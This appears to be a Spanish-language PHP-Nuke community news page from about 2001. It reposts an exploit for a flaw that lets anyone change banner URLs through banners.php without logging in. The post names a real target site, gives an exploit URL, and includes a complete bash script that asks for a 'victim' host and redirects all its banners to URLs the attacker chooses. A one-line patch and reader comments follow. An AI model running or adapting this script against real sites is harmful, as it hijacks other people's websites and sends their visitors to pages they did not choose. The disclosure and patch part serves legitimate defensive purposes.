Buscar
Tópicos
  Crear una cuenta Home  ·  Enviar Noticia  ·  FOROS  ·  Tu Cuenta  ·  Directorio  ·  Download  
Bloque Principal

Quien está en línea
Hay actualmente, 7 invitado(s) y 1 miembro(s) que están en línea.

Eres un usuario Anónimo. Puedes registrarte aquí.

Software
Si quieres conocer más sobre PHP-NUKE...

  • PHP-Nuke





Sponsored by MandrakeSoft


Download
Quieres bajar PHP-Nuke, entonces no esperes más:

  • PHP-Nuke

Phpnuke.org
  • A new theme to download
  • Styles4miles.net ~*nuked*~
  • YANS: Nodge.NET - Computing/IT News and discussion
  • Just a few YANS. (made in Australia!)
  • OpenGL, C/C++ and Php site Nuked
  • mop_portal got nuked
  • WebMail with AddressBook addon
  • My new phpnuke site
  • Yet Another Nuke Site goes live - www.crippl3.net
  • Site Running Nuke 5 RC1
read more...

NukeAddon.com
  • AddOn bugs fixed!
  • LinuxDevs.com Nuked-Syndicate our news to your site
  • Running Multiple sites and domains with one PHP Nuke instance
  • 26 Themes now ready for Nuke5 + most languages
  • Running Multiple sites and domains with one Nuke Instance
  • New topsites module ready for testing.
  • PHP-Nuke Trouble Tickets v1.0b released!
  • Danish community for the development of PHP-Nuke
  • Multiple form administering Nuke Module released for distribution
  • My_eGallery 2.0 : 5th Fix and last fix ?
read more...

Nuevo Exploit para PHP-NUKE
Enviado el Lunes, abril 02 @ 10:47:17 PDT by NukeManContributed by: neocrom

Hackers - CrackersEl otro día al pulsar sobre mi banner de mi web en phpnuke, ¡¡ Sorpresa!!, aparece una página que no es la anunciada. Entre en la administración de banners y comprobé que habian cambiado la url del banners.
Miré la web a la que enlazaba mi banner, que era en phpnuke, una noticia en la que esplicaba como cambiar la url de los banners en sitios phpnuke y como solucionarlo. Como me parece interesante, aquí se lo copio y pego...
Hasta otra, NeoCrom.







Se ha descubierto un nuevo error en el software para portales web PHP-NUKE esta ves facilmente explotable y con concecuencias bastantes severas...
Cualquier sitio web "nukeado" y que este administrando banners es vulnerable, cuando digo "cualquier sitio" me refiero a todos!...
Muy bien vamos a lo interesante veamos como explotarlo...
Pongamos un ejemplo a mi parecer bastante arrogante y por ahora no les voy a cobrar el aviso, es gratis se;ores...www.linux.cl
El primer banner de este sitio es:
http://www.linux.cl/banners.php?op=click&bid=1
que apunta a algun url... para cambiar esa url adonde apunta el banner bastaria con figarse en el numero del bid y poner lo sgt:
http://www.linux.cl/banners.php?op=Change&bid=1&url=http://www.electron-team.cl
con esto logramos que el banner apunte hacia nuestra web.
Ahora y para los regalones les va un script en bash que cambia todos los banners pares e impares.
-------------------- Corta aqui ------------------------
#!/bin/bash
echo -n "Ingresa el host de la victima (ie. www.linux.cl): "
read VICTIMA
VICTIMA=`echo $VICTIMA | sed -e s/"/"//g | sed -e s/"http:"//g`
if [ -z $VICTIMA ]; then
echo "No has ingresado un host victima, sorry";
exit 1;
fi
echo
echo -n "Ingresa la url completa para los banners impares: "
read IMPARES
echo $IMPARES | grep -q -v ^"http://" && IMPARES="http://$IMPARES"
if [ -z $IMPARES ]; then echo "No has ingresado un host... sorry";
exit 1;
fi
echo
echo -n "Ingresa la url completa para los banners pares: "
read PARES
echo $PARES | grep -q -v ^"http://" && PARES="http://$PARES"
if [ -z $PARES ]; then echo "No has ingresado un host... sorry";
exit 1;
fi
echo
echo "OK, presiona [enter] para continuar, ^C para cancelar!"
read A
echo "Modificando URLs impares..."
for I in `seq 1 2 20` ; do lynx -dump "http://$VICTIMA/banners.php?op=Change&bid=$I&url=$IMPARES" &> /dev/null ;
done
echo "Modificando URLs pares..."
for I in `seq 2 2 20` ; do lynx -dump
"http://$VICTIMA/banners.php?op=Change&bid=$I&url=$PARES" &> /dev/null ; done echo "El trabajo ha sido hecho ;D"
echo
-------------------- Corta aqui ------------------------
Le comente este problema a un amigo mio PinkX de Linux Chile el cual inmediatamente busco el error en el codigo y creo el sgt parche:
"La linea 288 del archivo banners.php ahy que reemplazarla por lo sgt:
if(trim($pass) != NULL && $pass == $passwd) {"
Gracias PinkX por tu valioso aporte ya que por lo que yo tengo entendido no hay ningun parche oficial de este bug...

 
Enlaces Relacionados

Noticia más leída de Hackers - Crackers:
http://elmonomario.com Hackeada Por Ex Enpleado, Vinculaciones Amorosas...


Ultimas Noticias de Hackers - Crackers:


Página Imprimible  Enviar este Artículo a un Amigo

"Nuevo Exploit para PHP-NUKE" | Login/Crear Cuenta | 2 comentarios
Puntos
Los comentarios son propiedad de quien los escribió. Nosotros no somos responsables de su contenido.

Re: Nuevo Exploit para PHP-NUKE (Puntuación: 1)
por Sirma el Martes, abril 03 @ 15:33:54 PDT
(Datos de Usuario)

Hola:
Yo no uso banners, pero gracias por el aviso y gracias a PinkX por el parche.

Un saludo.

[ Responder ]

Re: Nuevo Exploit para PHP-NUKE (Puntuación: 0)
por Anonymous el Martes, abril 03 @ 16:26:08 PDT

tmb gracias aEST por el exploit.

[ Responder ]


 
Web site powered by PHP-Nuke Web site using PHPBB IntegrationApache Web ServerPHP Scripting Language

All logos and trademarks in this site are property of their respective owner. The comments are property of their posters, all the rest © 2000 by me
This web site was made with PHP-Nuke, a web portal system written in PHP. PHP-Nuke is Free Software released under the GNU/GPL license.
You can syndicate our news using the file backend.php or ultramode.txt